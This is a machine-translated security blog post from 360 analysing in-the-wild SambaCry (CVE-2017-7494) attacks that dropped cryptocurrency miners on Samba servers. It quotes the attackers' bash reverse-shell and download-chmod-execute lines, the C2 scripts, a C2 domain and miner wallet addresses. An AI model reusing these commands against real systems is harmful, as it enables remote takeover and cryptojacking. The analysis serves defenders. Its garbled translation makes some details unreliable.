360 core security technology blog

Posted by trammel at 2020-02-29

Author: redrain & houjingyi159 @ 360 Network Security Response Center

Samba released version 4.6.4 on May 24, 2017. A serious Remote Code Execution Vulnerability, cve-2017-7494, was fixed in the middle. The vulnerability affected all versions of samba from 3.5.0 to 4.6.4/4.5.10/4.4.14. 360 network security center and gear team of 360 information security department analyzed the vulnerability for the first time, and confirmed it was a serious vulnerability, which could cause remote code execution. Http:// Remote Code Execution Vulnerability cve-2017-7494 analysis/

Sambacry vulnerability is a worm like vulnerability with scale propagation. Recently, Kaspersky Security Laboratory caught an attack of exploiting BOT maliciously through sambacry vulnerability for block connected digital currency mining through honeypot. Here, the 360 network security center and the 360 sun chasing team made a specific technical analysis of the back door used in the incident.

Loophole utilization

Because the vulnerability requires writable permission for SMB shared drive letter, according to the attack package captured by honeypot in Kaspersky Lab, the attacker first attempts to write a file with random character name to the server, and then delete it after success.

After successful detection, the attacker brutally guesses the full path of the file written to obtain the path of the shared directory, and writes the malicious lib as the payload.

After blasting to the correct path, use cve-2017-7494 vulnerability to load malicious lib execution command. Because Samba is started with root permission by default, the command executed by loading lib will also be executed with root permission. After successful utilization, delete the written lib and execute malicious command operation only in memory.

Malicious lib samples (inaebsgb. So) and (cblrvuoc. So)

Sample analysis

In, the attacker executed a very simple bounce shell operation with / bin / sh to execute the download file or execute subsequent commands. /bin/sh

It is found that this lib is actually generated by the is? Known? Pipename module of Metasploit.


Later, another was written. In this lib, the attacker bounced back to the port 4000 of C2 server and downloaded a mining program, using BOT as CPU miner. In this sample, we located C2 server and mining program.

In the act of execution:

bash -i < /dev/tcp/ || ((wget -O /tmp/m || curl -o /tmp/m) && chmod +x /tmp/m && (nohup /tmp/m &))

The attacker downloads executes it when / TMP / M grants permission. /tmp/m

Simply query C2 server as follows: A记录 时间 IP 国家 省/州 运营商 2017-05-17 美国 伊利诺伊州 2017-05-15 美国 伊利诺伊州 2017-04-30 瑞典 西约塔兰省

Typo hackers?

After connecting to port rc.ezreal.space4000 of C2 server, I see the following script: #!/usr/bin/env bash host=''; nohup bash -i < /dev/tcp/${host}/4001 & nohuo bash -i < /dev/tcp/${host}/4002 & nohuo bash -i < /dev/tcp/${host}/4003 &

The attacker wanted to ignore the system hang up and run in the background through nohup, but he didn't know if it was due to careless handshake. Nohup called nohuo

nohup nohuo

Access the other three ports to get these scripts:

➜ /tmp nc 4001 #!/usr/bin/env bash host=''; target=$RANDOM;; target=/tmp/$target; cat < /dev/tcp/${host}/5000 > $target && chmod +x $target && nohup $target & ➜ /tmp nc 4002 #!/usr/bin/env bash ➜ /tmp nc 4003 #!/usr/bin/env bash

The miner program obtained from port 5000 in C2 is the same as that obtained from HTTP download

Miner analysis

Up to now, the C2 server is still alive. Download minerd64? S and simply analyze it. It is found that it is a common CPU mining program, miderd. However, the attacker does not have the common additional parameters, but hardcode all the parameters into the program, puts the parameters to be executed.

minerd64_s miderd

The attacker's mine pool and wallet address were quickly found here:

.rodata:0000000000515604 00000026 C stratum+tcp: .rodata:00000000005156CC 00000060 C 43xtViRHn1oibjS6yZSgS6XhFFkSRGC5SHgmymH6ei4r5osjPrC1z85BeCZS89ZtL4iDGDoUhEoKtcVe115Wp7sB6XzHmgy

Through the transaction query of the mining pool, we know that the attacker is digging a kind of counterfeit currency 'xdn' and 'XmR'. Check the recent transfer in situation and find that the income is not bad:)

Another attack

I thought that our analysis and Kaspersky were almost the same, but I found that 360 day chasing team also provided a sample (oooo. So)

This lib is very similar to, but the operation is not the same

Just bounce a port connected to C2 server, and return a shell script after connecting:

#!/usr/bin/env bash pkill .so; host=''; target=$RANDOM;; target=/tmp/$target; cat < /dev/tcp/${host}/5555 > $target && chmod +x $target && nohup $target &

Visit to get another miner program. The difference between Miner and wallet address is

.rodata:0000000000515604 00000024 C stratum+tcp: .rodata:00000000005156CC 00000060 C 4AxoWMDfiPkh1PDHeyDi2TRpHC8hxHKY6ACtWRSY9Um4PuwPqjn9vAhdsSshmGu1RbZBUgKX42f584jGENHwXxsVGENHoGV


From the beginning of sambacry vulnerability disclosure, we expect that hackers will make malicious use of it and make profits from it. We think that recently, due to the wannacry incident of eternalblue, hacker attacks are becoming normalized, especially when there are general and extremely easy to use vulnerabilities exposed, attacks may follow. With the increase of bitcoin value, the value of other virtual currencies also increases, which also provides a cash channel for hackers to make profits through network attacks..


On May 24, 2017, samba released version 4.6.4, which fixed the Remote Code Execution Vulnerability cve-2017-74942017-5-25, 360 network security response center and 360 information security department jointly issued an early warning notice and the first vulnerability analysis. On May 30, 2017, Kaspersky Security Laboratory captured the wild malicious exploitation of sambacry through honeypot for the first time on June 12, 2017 360 network security response center and 360 sun chasing team jointly carry out technical analysis on attack mode

Reference source

The author cyg07 was published on June 13, 2017 at 02:41:28, and was added to classified virus analysis Next, last revised on August 14, 2018 14:47:41

cyg07 病毒分析